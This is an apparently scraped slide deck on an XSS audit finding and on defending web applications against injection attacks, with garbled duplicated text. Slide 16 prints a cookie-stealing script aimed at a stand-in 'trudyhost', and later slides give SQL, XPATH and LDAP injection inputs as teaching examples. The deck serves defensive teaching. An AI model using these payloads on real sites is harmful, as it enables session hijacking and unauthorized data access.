Upload
alper-kayisi
View
219
Download
0
Embed Size (px)
Citation preview
8/6/2019 Web Audit Vulnerability
1/34
Web Audit VulnerabilityWeb Audit Vulnerability
crosscross--site scripting (XSS) concernssite scripting (XSS) concerns
by Ron Widitzby Ron Widitz
8/6/2019 Web Audit Vulnerability
2/34
8/6/2019 Web Audit Vulnerability
3/34
Audit ResponseAudit Response
Either:Either:
Prove issue to be a nonProve issue to be a non--problemproblemoror
Describe actions to takeDescribe actions to take
8/6/2019 Web Audit Vulnerability
4/34
8/6/2019 Web Audit Vulnerability
5/34
Resolution StepsResolution Steps
Investigate security concernsInvestigate security concerns
Restate asIT
problem(s)Restate asIT
problem(s) Determine solution(s)Determine solution(s)
Provide audit responseProvide audit response
Mitigate riskMitigate risk
8/6/2019 Web Audit Vulnerability
6/34
InvestigationInvestigation
Define crossDefine cross--site scripting (XSS)site scripting (XSS)
Ex
amine how auditors appliedEx
amine how auditors applied Identify risksIdentify risks
Research preliminary solutionsResearch preliminary solutions
8/6/2019 Web Audit Vulnerability
7/34
crosscross--site scriptingsite scripting
Attacker goal: their code into browserAttacker goal: their code into browser
XSS forces a website to executeXSS forces a website to executemalicious code in browsermalicious code in browser
Browser user is the intended victimBrowser user is the intended victim
Why? Account hijacking, keystrokeWhy? Account hijacking, keystrokerecording, intranet hacking, theftrecording, intranet hacking, theft
8/6/2019 Web Audit Vulnerability
8/34
XSS conceptXSS concept
8/6/2019 Web Audit Vulnerability
9/34
Auditor findingAuditor finding
Freeform edit boxFreeform edit box
Message toMessage toCustomer ServiceCustomer Service
8/6/2019 Web Audit Vulnerability
10/34
XSS typesXSS types
Immediate reflection : phishingImmediate reflection : phishing
DOMDOM--based : 95 JavaScript methodsbased : 95 JavaScript methods
Redirection : header, meta, dynamicRedirection : header, meta, dynamic
Multimedia : Flash, QT, PDF scriptsMultimedia : Flash, QT, PDF scripts
CrossCross--Site RequestForgery (CSR
F)Site Request
Forgery (CSR
F)
othersothers
(e.g. non(e.g. non--persistent search box)persistent search box)
8/6/2019 Web Audit Vulnerability
11/34
RisksRisks
XSS abuses render engines or plugXSS abuses render engines or plug--insins
Steal browser cookiesSteal browser cookies Steal session info for replay attackSteal session info for replay attack
Malware or bot installationMalware or bot installation
Redirect or phishing attemptRedirect or phishing attempt
8/6/2019 Web Audit Vulnerability
12/34
Our actual riskOur actual risk
Currently, none.Currently, none.
Edit box info viewed in thick clientEdit box info viewed in thick client
DHTML or JavaScript needs browserDHTML or JavaScript needs browser
Our thick client is Java SwingOur thick client is Java Swing--basedbased
8/6/2019 Web Audit Vulnerability
13/34
Planned Audit ResponsePlanned Audit Response
Could indicate no audit problemCould indicate no audit problem
Might have future impactMight have future impact
Address through dev standardsAddress through dev standards
Consider application firewallConsider application firewall
Widen problem scope to include allWiden problem scope to include alluser agent injection tacticsuser agent injection tactics
8/6/2019 Web Audit Vulnerability
14/34
More on Web AttacksMore on Web Attacks
Cross Site ScriptingCross Site Scripting
SQL InjectionSQL Injection
XPATH InjectionXPATH Injection
LDAP InjectionLDAP Injection
SSI
(server side inclusion)InjectionSS
I(server side inclusion)
Injection
JSP (Java server pages) InjectionJSP (Java server pages) Injection
8/6/2019 Web Audit Vulnerability
15/34
ArtifactsArtifacts
For each injection issue:For each injection issue:
Vulnerability description documentedVulnerability description documented
Preventative coding techniquePreventative coding technique
Discuss with App Dev teamsDiscuss with App Dev teams
Publish and socialize directionPublish and socialize direction
Include in peer reviews/code walkthroughsInclude in peer reviews/code walkthroughs
Set deadlines for full incorporationSet deadlines for full incorporation
Communicate with auditorsCommunicate with auditors
8/6/2019 Web Audit Vulnerability
16/34
Cross Site ScriptingCross Site Scripting
Example 1Example 1 Trudy posts the following JavaScript on aTrudy posts the following JavaScript on a
message board:message board:
document.location='http://trudyhost/cgidocument.location='http://trudyhost/cgi--bin/bin/stealcookie.cgi?'+document.cookiestealcookie.cgi?'+document.cookie
When Bob views the posted message, hisWhen Bob views the posted message, hisbrowser executes the malicious script, andbrowser executes the malicious script, andhis session cookie is sent to Trudyhis session cookie is sent to Trudy
8/6/2019 Web Audit Vulnerability
17/34
Cross Site ScriptingCross Site Scripting
Example 2Example 2 Trudy sends a link to the following URL to Bob thatTrudy sends a link to the following URL to Bob that
will take him to a personalized page:will take him to a personalized page:
http://host/personalizedpage.php?username=
8/6/2019 Web Audit Vulnerability
18/34
Cross Site ScriptingCross Site Scripting
DetectionDetection A client usually is not supposed to sendA client usually is not supposed to send
scripts to serversscripts to servers
If the server receives or theIf the server receives or thehex equivalent in an incoming packet andhex equivalent in an incoming packet andthat same script is sent unsanitized in anthat same script is sent unsanitized in anoutgoing packet or in an outgoing SQLoutgoing packet or in an outgoing SQLstatement to the database, then an attackstatement to the database, then an attackhas occurredhas occurred
A sanitized script could look likeA sanitized script could look like
&ls;SCRIPT>&ls;SCRIPT>
8/6/2019 Web Audit Vulnerability
19/34
SQL Injection ExampleSQL Injection Example
Trudy accesses Bobs website; in which he does notTrudy accesses Bobs website; in which he does notvalidate input on his sign in formvalidate input on his sign in form
Runs a SQL statement like the following:Runs a SQL statement like the following:
SELECT
* fromA
ccounts where username =SELECT
* fromA
ccounts where username =USER_NAME and password = USER_PASS;USER_NAME and password = USER_PASS;
In the password field, she types as her password:In the password field, she types as her password:
X OR x=xX OR x=x
Manipulates the server into running the following SQLManipulates the server into running the following SQL
command:command: SELECT * from Accounts where username =SELECT * from Accounts where username =
USER_NAME and password=X OR x=x;USER_NAME and password=X OR x=x;
Selects all account informationSelects all account information
8/6/2019 Web Audit Vulnerability
20/34
SQL Injection DetectionSQL Injection Detection
To detect and prevent this at BobsTo detect and prevent this at Bobslocationlocation
Log any traffic from Trudy to BobLog any traffic from Trudy to Bobcontaining form data containing acontaining form data containing aquotation markquotation mark
Match any outgoing SQL statements fromMatch any outgoing SQL statements from
Bobs web server to his database serverBobs web server to his database serverand verify that the quotation marks Trudyand verify that the quotation marks Trudysupplied were escapedsupplied were escaped
If they werent, take actionIf they werent, take action
8/6/2019 Web Audit Vulnerability
21/34
XPATH Injection ExampleXPATH Injection Example
Similar to SQL injectionSimilar to SQL injection
Bob has a form that does not sanitize userBob has a form that does not sanitize user--
provided input before using it as part of anprovided input before using it as part of anXPATH query::XPATH query:: string(//user[name/text()=USER_NAME' andstring(//user[name/text()=USER_NAME' and
password/text()=USER_PASS']/account/text())password/text()=USER_PASS']/account/text())
Trudy again can provide the following
Trudy again can provide the followingpassword to change the statements logic:password to change the statements logic:
X OR x=xX OR x=x
The statement thus selects the first accountThe statement thus selects the first account
8/6/2019 Web Audit Vulnerability
22/34
LDAP Injection ExampleLDAP Injection Example
Server using LDAP for authenticationServer using LDAP for authentication User name initialized, but then usesUser name initialized, but then uses
unchecked user input to create a queryunchecked user input to create a queryfilter = "(uid=" + CStr(userName) + ")" 'filter = "(uid=" + CStr(userName) + ")" '
searching for the user entrysearching for the user entry
A
ttacker can ex
ploit using specialA
ttacker can ex
ploit using specialcharacterscharacters
http://example/ldapsearch.asp?user=*http://example/ldapsearch.asp?user=*
8/6/2019 Web Audit Vulnerability
23/34
LDAP Injection DetectionLDAP Injection Detection
Detection is based off of usage ofDetection is based off of usage ofspecial LDAP charactersspecial LDAP characters
System monitors input for specialSystem monitors input for specialcharacterscharacters
Either scrubs incoming input or watchesEither scrubs incoming input or watches
for unescaped output passed to databasefor unescaped output passed to databaseserverserver
Detection approach is blackboxDetection approach is blackbox
8/6/2019 Web Audit Vulnerability
24/34
SSIInjection ExampleSSIInjection Example
Bob has his server configured to use ServerBob has his server configured to use Server--Side IncludesSide Includes
Trudy passes input with an SSI embeddedTrudy passes input with an SSI embedded>
SSI inserts malicious code into normalSSI inserts malicious code into normal
webpages upon next requestwebpages upon next request
Future legitimate users get contentFuture legitimate users get contentcontaining the tainted code included by thecontaining the tainted code included by theSSISSI
8/6/2019 Web Audit Vulnerability
25/34
SSIInjection DetectionSSIInjection Detection
Bobs system needs SSI enabled, so heBobs system needs SSI enabled, so heuses our system on local serversuses our system on local servers
SSI code can be detected by its specificSSI code can be detected by its specificformatformat HTML comment () containing a command>) containing a command
SSI commands can be stripped on ingressSSI commands can be stripped on ingress
Can also deny outgoing packets that do notCan also deny outgoing packets that do notinclude SSI as inputted (means successfulinclude SSI as inputted (means successfulexecution)execution)
Detection approach is blackboxDetection approach is blackbox
8/6/2019 Web Audit Vulnerability
26/34
JSP Injection ExampleJSP Injection Example
Similar to SSI injectionSimilar to SSI injection
Bob has a portal server configured toBob has a portal server configured touse dynamic code for templatesuse dynamic code for templates
Trudy passes input with an embeddedTrudy passes input with an embedded
malicious code inserted into webpagemalicious code inserted into webpage
8/6/2019 Web Audit Vulnerability
27/34
JSP Injection PreventionJSP Injection Prevention
Prefer static include Prefer static include
Dont allow file inclusion outside ofDont allow file inclusion outside of
server via Java2 Security policiesserver via Java2 Security policies Firewall rules to prevent outboundFirewall rules to prevent outbound
requests from serverrequests from server
Input validation codingInput validation coding Choose portal software not requiringChoose portal software not requiring
dynamic includes or code executiondynamic includes or code execution
8/6/2019 Web Audit Vulnerability
28/34
Defense ApproachesDefense Approaches
Web firewall/IDSWeb firewall/IDS ModSecurity for ApacheModSecurity for Apache
Commercial: SecureSphere fromCommercial: SecureSphere from
ImperviaImpervia Static code analysisStatic code analysis
Open source: NiktoOpen source: Nikto
Commercial:Commercial:
Acutenix Web Vulnerability ScannerAcutenix Web Vulnerability Scanner NN--stalkerstalker
Education on good codingEducation on good coding HTML encoding on input (serverHTML encoding on input (server--side)side)
Input validation/filteringInput validation/filtering
8/6/2019 Web Audit Vulnerability
29/34
Q&AQ&A
Suggestions?Suggestions?
8/6/2019 Web Audit Vulnerability
30/34
8/6/2019 Web Audit Vulnerability
31/34
8/6/2019 Web Audit Vulnerability
32/34
user agent injectionuser agent injection
StoredStored
HTTP Response SplittingHTTP Response Splitting
SQL InjectionSQL Injection
XML InjectionXML Injection
JSP CodeI
njectionJSP CodeI
njection LDAP InjectionLDAP Injection
8/6/2019 Web Audit Vulnerability
33/34
ApproachesApproaches
Application firewallApplication firewall
HT
ML encoding on inputHT
ML encoding on input(server(server--side)side)
Input validation/filteringInput validation/filtering
Coding techniques with outputCoding techniques with output
Session key enforced toSession key enforced toprevent CSRFprevent CSRF
8/6/2019 Web Audit Vulnerability
34/34
XPATH InjectionXPATH Injection
DetectionDetection Again, our system can detect this byAgain, our system can detect this by
matching any submission by Trudymatching any submission by Trudy
containing a quotation mark againstcontaining a quotation mark againstoutbound XPATH queriesoutbound XPATH queries
Correction can again be done byCorrection can again be done byescaping any rogue quotation marksescaping any rogue quotation marksTrudy may have insertedTrudy may have inserted
Detection approach is blackboxDetection approach is blackbox